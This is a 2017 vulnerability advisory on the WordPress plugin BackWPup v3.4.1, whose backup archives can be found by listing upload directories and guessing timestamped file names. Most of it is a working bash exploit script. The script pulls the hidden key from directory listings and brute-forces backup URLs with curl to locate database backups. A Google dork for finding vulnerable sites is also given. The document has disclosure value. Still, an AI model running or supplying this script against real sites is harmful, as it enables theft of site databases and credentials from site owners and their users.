Advisory #: 201
Title: Vulnerability in Wordpress Plugin backwpup v3.4.1 possible brute forcing of backup file download
Author: Larry W. Cashdollar, @_larry0
Date: 2017-09-08
CWE: CWE-552 Files or Directories Accessible to External Parties
Download Site:
Vendor: Inpsyde
Vendor Notified: 2017-09-08
Vendor Contact:
Description: "The backup plugin BackWPup can be used to save your complete installation including /wp-content/ and push them to an external Backup Service, like Dropbox, S3, FTP and many more."
There is a weakness in the way backwpup creates and stores the backup files it generates. It creates a random string to obscure the location, but it uses that same string to create the storage directory under wp-content/uploads/ which in most installations of WordPress allows file listings. Someone looking to steal a copy of the database could simply list the directories in /uploads to find that random string and then brute force the location of the file as its structure is just a date and time stamp. It would take a Maximum of 86400 tries to guess if a backup is available for that day. Filename format: backwpup_ RANDOMSTRINGBACKUPNUMBER_%Y-%m-%d_%H-%i-%s Default settings are: %d = Two digit day of the month, with leading zeros %m = Day of the month, with leading zeros %Y = Four digit representation for the year %H = Hour in 24-hour format, with leading zeros %i = Two digit representation of the minute %s = Two digit representation of the second I have an exploit available if you're interested.
Exploit Code:
  1. #!/bin/bash
  2. #Exploit for Wordpress Plugin BackWPup v3.4.1
  3. #Download
  4. #CWE-552: Files or Directories Accessible to External Parties
  5. #CVE-ID: CVE-2017-2551
  6. #Google Dork: inurl:wp-content/uploads/backwpup
  9. #Add banner about vulnerability
  11. KEY=`curl --silent http://$1/wp-content/uploads/|html2text |grep backups | awk -F- '{print $2}'`
  13. #Add error checking here
  14. echo "[+] Getting Unique Key $KEY"
  15. DIR="backwpup-$KEY-backups"
  16. echo "[+] Checking directory $DIR"
  17. WPATH="$DIR/backwpup_$KEY"
  18. echo "[+] Creating Path: $WPATH"
  19. #use date command here for the default date of current day
  20. MONTH=09
  21. DAY=07
  22. YEAR=2017
  23. Z=0
  25. echo "[+] Scanning website for available backups:"
  26. for y in `seq -w 0 23`; do
  27. for x in `seq -w 0 59`; do
  28. Y=`echo "scale=2;($Z/86000)*100"|bc`;
  29. echo -ne "\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b\b$CWPATH $Y%"
  30. for z in `seq -w 0 59`; do
  31. Z=$(( $Z + 1 ));
  32. CWPATH="http://$1/wp-content/uploads/$WPATH"01"_"$YEAR"-"$MONTH"-"$DAY"_"$y"-"$x"-"$z".zip";
  33. RESULT=`curl -s --head $CWPATH|grep 200`;
  34. if [ -n "$RESULT" ]; then
  35. echo ""
  36. echo "[+] Location $CWPATH Found";
  37. echo "[+] Received $RESULT";
  38. echo "Downloading......";
  39. # wget $CWPATH
  40. fi;
  41. done
  42. done
  43. done
  44. echo "Completed."
Screen Shots:
Google Dork: inurl:wp-content/uploads/backwpup